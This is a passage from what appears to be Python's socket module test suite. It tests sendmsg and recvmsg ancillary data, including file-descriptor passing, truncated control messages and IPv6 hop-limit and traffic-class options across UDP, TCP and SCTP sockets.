# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
def _testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSetTrafficClassAndHopLimit(self):
# Test setting traffic class and hop limit on outgoing packet,
# and receiving them at the other end.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testSetTrafficClassAndHopLimit.client_skip
def _testSetTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testOddCmsgSize(self):
# Try to send ancillary data with first item one byte too
# long. Fall back to sending with correct size if this fails,
# and check that second item was handled correctly.
self.checkTrafficClassAndHopLimit(ancbufsize=10240,
maxhop=self.hop_limit)
@testOddCmsgSize.client_skip
def _testOddCmsgSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
try:
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class]).tobytes() + b"\x00"),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
except OSError as e:
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer(
[MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS,
array.array("i", [self.traffic_class])),
(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))])
self.assertEqual(nbytes, len(MSG))
# Tests for proper handling of truncated ancillary data
def checkHopLimitTruncatedHeader(self, ancbufsize, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space, which should be too small to contain the ancillary
# data header (if ancbufsize is None, pass no second argument
# to recvmsg()). Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and no ancillary data is
# returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
args = () if ancbufsize is None else (ancbufsize,)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), *args)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no ancillary
# buffer size is provided.
self.checkHopLimitTruncatedHeader(ancbufsize=None,
# BSD seems to set
# MSG_CTRUNC only if an item
# has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
@testCmsgTruncNoBufSize.client_skip
def _testCmsgTruncNoBufSize(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc0(self):
# Check that no ancillary data is received when ancillary
# buffer size is zero.
self.checkHopLimitTruncatedHeader(ancbufsize=0,
ignoreflags=socket.MSG_CTRUNC)
@testSingleCmsgTrunc0.client_skip
def _testSingleCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=1)
@testSingleCmsgTrunc1.client_skip
def _testSingleCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTrunc2Int(self):
self.checkHopLimitTruncatedHeader(ancbufsize=2 * SIZEOF_INT)
@testSingleCmsgTrunc2Int.client_skip
def _testSingleCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncLen0Minus1(self):
self.checkHopLimitTruncatedHeader(ancbufsize=socket.CMSG_LEN(0) - 1)
@testSingleCmsgTruncLen0Minus1.client_skip
def _testSingleCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSingleCmsgTruncInData(self):
# Test truncation of a control message inside its associated
# data. The message may be returned with its data truncated,
# or not returned at all.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG), socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertLess(len(cmsg_data), SIZEOF_INT)
@testSingleCmsgTruncInData.client_skip
def _testSingleCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
def checkTruncatedSecondHeader(self, ancbufsize, ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space, which should be large enough to
# contain the first item, but too small to contain the header
# of the second. Check that data is MSG, MSG_CTRUNC is set
# (unless included in ignoreflags), and only one ancillary
# data item is returned.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertIn(cmsg_type, {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT})
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
# Try the above test with various buffer sizes.
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc0(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT),
ignoreflags=socket.MSG_CTRUNC)
@testSecondCmsgTrunc0.client_skip
def _testSecondCmsgTrunc0(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) + 1)
@testSecondCmsgTrunc1.client_skip
def _testSecondCmsgTrunc1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTrunc2Int(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
2 * SIZEOF_INT)
@testSecondCmsgTrunc2Int.client_skip
def _testSecondCmsgTrunc2Int(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecondCmsgTruncLen0Minus1(self):
self.checkTruncatedSecondHeader(socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(0) - 1)
@testSecondCmsgTruncLen0Minus1.client_skip
def _testSecondCmsgTruncLen0Minus1(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testSecomdCmsgTruncInData(self):
# Test truncation of the second of two control messages inside
# its associated data.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(
self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) + socket.CMSG_LEN(SIZEOF_INT) - 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
cmsg_types = {socket.IPV6_TCLASS, socket.IPV6_HOPLIMIT}
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
if ancdata:
cmsg_level, cmsg_type, cmsg_data = ancdata.pop(0)
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
cmsg_types.remove(cmsg_type)
self.assertLess(len(cmsg_data), SIZEOF_INT)
self.assertEqual(ancdata, [])
@testSecomdCmsgTruncInData.client_skip
def _testSecomdCmsgTruncInData(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Derive concrete test classes for different socket types.
class SendrecvmsgUDPTestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDPTest(SendmsgConnectionlessTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDPTest(RecvmsgTests, SendrecvmsgUDPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDPTest(RecvmsgIntoTests, SendrecvmsgUDPTestBase):
pass
class SendrecvmsgUDP6TestBase(SendrecvmsgDgramFlagsBase,
SendrecvmsgConnectionlessBase,
ThreadedSocketTestMixin, UDP6TestBase):
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer, ignoring scope ID
self.assertEqual(addr1[:-1], addr2[:-1])
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgUDP6Test(SendmsgConnectionlessTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgUDP6Test(RecvmsgTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoUDP6Test(RecvmsgIntoTests, SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgRFC3542AncillaryUDP6Test(RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@requireAttrs(socket, "IPPROTO_IPV6")
@requireSocket("AF_INET6", "SOCK_DGRAM")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoRFC3542AncillaryUDP6Test(RecvmsgIntoMixin,
RFC3542AncillaryTest,
SendrecvmsgUDP6TestBase):
pass
class SendrecvmsgTCPTestBase(SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, TCPTestBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgTCPTest(SendmsgStreamTests, SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgTCPTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
@requireAttrs(socket.socket, "recvmsg_into")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoTCPTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
SendrecvmsgTCPTestBase):
pass
class SendrecvmsgSCTPStreamTestBase(SendrecvmsgSCTPFlagsBase,
SendrecvmsgConnectedBase,
ConnectedStreamTestMixin, SCTPStreamBase):
pass
@requireAttrs(socket.socket, "sendmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class SendmsgSCTPStreamTest(SendmsgStreamTests, SendrecvmsgSCTPStreamTestBase):
pass
@requireAttrs(socket.socket, "recvmsg")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgSCTPStreamTest(RecvmsgTests, RecvmsgGenericStreamTests,
SendrecvmsgSCTPStreamTestBase):
def testRecvmsgEOF(self):
try:
super(RecvmsgSCTPStreamTest, self).testRecvmsgEOF()
except OSError as e:
if e.errno != errno.ENOTCONN:
raise
self.skipTest("sporadic ENOTCONN (kernel issue?) - see issue #13876")
@requireAttrs(socket.socket, "recvmsg_into")
@requireSocket("AF_INET", "SOCK_STREAM", "IPPROTO_SCTP")
@unittest.skipUnless(thread, 'Threading required for this test.')
class RecvmsgIntoSCTPStreamTest(RecvmsgIntoTests, RecvmsgGenericStreamTests,
